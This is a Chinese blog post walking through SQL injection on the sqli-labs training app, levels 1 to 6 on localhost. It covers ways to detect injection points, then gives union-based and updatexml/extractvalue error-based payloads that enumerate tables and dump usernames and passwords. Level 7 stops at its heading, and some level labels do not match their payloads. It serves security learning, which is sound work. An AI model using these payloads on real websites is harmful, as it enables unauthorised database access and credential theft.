SQLi注入-实战篇-2020-04-07

SQL注入点判断:

1、单引号判断

http://localhost/sqli/Less-1/?id=1' 如果出现错误提示,则该网站可能就存在注入漏洞

2、and判断

http://localhost/sqli/Less-1/?id=1' and 1=1--+ 这个条件永远都是真的,所以当然返回是正常页

http://localhost/sqli/Less-1/?id=1' and 1=2--+ 如果报错那说明存在注入漏洞,还要看报的什么错,不可能报任何错都有注入漏洞的。

3、OR判断(or跟and判断方法不一样的,and是提交返回错误才有注入点,而OR是提交返回正确有注入点)

http://localhost/sqli/Less-1/?id=1' or 1=1--+

http://localhost/sqli/Less-1/?id=1' or 1=2--+

两个语句都是返回正确,这就是证明有注入点。

4、xor判断(xor后面的语句如果是正确的,则返回错误页面,如果是错误,则返回正确页面,说明存在注入点。)

http://localhost/sqli/Less-1/?id=1' xor 1=1--+ #返回错误的页面,存在注入点

http://localhost/sqli/Less-1/?id=1' xor 1=2--+ #返回正确的页面,存在注入点

5、加减号数字判断(返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞.)

http://localhost/sqli/Less-2/?id=10-0 #正常

http://localhost/sqli/Less-2/?id=10-1 #正常

http://localhost/sqli/Less-2/?id=10+1 #错误

6、输入框判断

可以使用特殊符号去判断

#@!$/...

登录框注入,使用@,--都无效,但是使用\报错,这时候上sqlmap,发现可以注入。

 

第一关  ('单引号闭合)

http://localhost/sqli/Less-1/

http://localhost/sqli/Less-1/?id=1'  数据库报错,认为这里有注入点

http://localhost/sqli/Less-1/?id=1' order by 3--+  判断有多少个列数 

http://localhost/sqli/Less-1/?id=-1' union select 1,2,3--+  union注入开始

http://localhost/sqli/Less-1/?id=-1' union select 1,database(),3--+  得到数据库security

http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables  where table_schema=database()--+  获取表名 users

http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns  where table_name='users'--+  获取表字段  username,password

http://localhost/sqli/Less-1/?id=-1' union select 1,group_concat(username,'|',password),3 from users--+  账号密码

第二关  (无需闭合注入)

http://localhost/sqli/Less-2

http://127.0.0.1/sqli/Less-2/?id=1' #数据库报错,这里有上传点

http://127.0.0.1/sqli/Less-2/?id=1 order by 3--+ #等到列数是3

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3--+ #union注入 http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,database(),3--+ #得到数据库是security

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #获得数据表名是users

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #获取表的字段

http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,group_concat(password,'~',username),3 from users--+ #用户名和密码

第三关  (")双引号加括号闭合)

http://localhost/sqli/Less-3

http://localhost/sqli/Less-3/?id=1' #看到报错信息,尝试')作为闭合点

http://localhost/sqli/Less-3/?id=1') and 1=1--+ #无报错证明,闭合成功

http://localhost/sqli/Less-3/?id=-1') order by 3--+ #测出列数为3

http://localhost/sqli/Less-3/?id=-1') union select 1,database(),3--+ #得到数据库security

http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ #得到数据表users

http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ #得到数据表的字段username和password

http://localhost/sqli/Less-3/?id=-1') union select 1,group_concat(username,'~',password),3 from users--+ #获得用户名和密码

第四关  (')单引号加括号闭合)

http://localhost/sqli/Less-4

http://localhost/sqli/Less-4/?id=1%27  #单引号没有报错信息

http://localhost/sqli/Less-4?id=1"  #看到报错信息,确定报错语句是双引号

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

http://localhost/sqli/Less-4?id=1"--+  #构造一个正确的闭合条件

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

http://localhost/sqli/Less-4?id=1")--+  #返回正常,闭合成功

http://localhost/sqli/Less-4?id=1") order by 3--+  #获取列数3

http://localhost/sqli/Less-4?id=-1") union select 1,database(),3--+  #得到数据库security

http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",table_name),3 from information_schema.tables where table_schema=database()--+  #得到数据表users

http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",column_name),3 from information_schema.columns where table_name='users'--+  #得到users表的字段username,password

http://localhost/sqli/Less-4?id=-1") union select 1,group_concat("<br/>",username,"~",password),3 from users--+  #得到数据库user的用户名和密码

第五关  ('单引号闭合&&updatexml报错注入)

http://localhost/sqli/Less-5

http://localhost/sqli/Less-5/?id=1'  #报错了,显然知道单引号是关键

http://localhost/sqli/Less-5/?id=1' order by 3--+  #报错列数为3

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select database()),0x7e),1)),3--+  #得到数据库security

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)),3--+  #得到数据表users

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e),1)),3--+  #得到数据库字段password

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e),1)),3--+  #得到数据库字段username

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)),3--+  #用户名Dumb

http://localhost/sqli/Less-5/?id=1' union select 1,(updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)),3--+  #密码Dumb

 第六关  ("双引号闭合&&extractvalue报错注入)

 http://localhost/sqli/Less-6

http://localhost/sqli/Less-6/?id=6"--+ #很明显的说双引号就是闭合点

http://localhost/sqli/Less-6/?id=6" order by 3--+ #列数为3

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select database()),0x7e))),3--+ #数据库security

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))),3--+ #数据表users

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 4,1),0x7e))),3--+ #数据表的字段password

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 7,1),0x7e))),3--+ #数据表的字段username

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select username from users limit 7,1),0x7e))),3--+ #获得用户名admin

http://localhost/sqli/Less-6/?id=6" union select 1,(extractvalue(1,concat(0x7e,(select password from users limit 7,1),0x7e))),3--+ #获得密码admin

  第七关   

  http://localhost/sqli/Less-7

 

posted @ 2020-04-07 16:31  llcnKill  阅读(587)  评论(0编辑  收藏  举报